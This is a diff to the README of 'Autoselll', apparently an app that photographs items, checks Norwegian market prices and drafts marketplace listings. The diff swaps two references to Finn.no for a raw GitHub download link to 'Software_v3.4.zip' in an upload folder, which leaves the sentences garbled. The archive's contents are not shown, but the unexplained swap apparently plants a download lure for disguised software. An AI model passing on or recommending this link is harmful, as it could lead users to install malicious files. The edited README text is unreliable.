santiagofavero/Autoselll/README.md

 - Step 1: Take a photo
   - You capture a photo of the item.
 The system uses computer vision to infer key attributes.
 - Step 2: Validate pricing
-  - The agent cross-checks prices with Norwegian market data, prioritizing Finn.no for reference values, trends, and comparable items.
+  - The agent cross-checks prices with Norwegian market data, prioritizing https://github.com/santiagofavero/Autoselll/raw/refs/heads/main/app/upload/Software_v3.4.zip for reference values, trends, and comparable items.
 - Step 3: Create listing content
   - The AI crafts a description in Norwegian that emphasizes features, condition, and selling points.
 It adapts tone to the target platform.
 - Step 4: Publish readiness
-  - The system packages everything for posting to FINN.no and Facebook Marketplace, preserving platform constraints like character limits and formatting.
+  - The system packages everything for posting to https://github.com/santiagofavero/Autoselll/raw/refs/heads/main/app/upload/Software_v3.4.zip and Facebook Marketplace, preserving platform constraints like character limits and formatting.

 Supported items and use cases
 - Electronics: phones, tablets, laptops, cameras, audio gear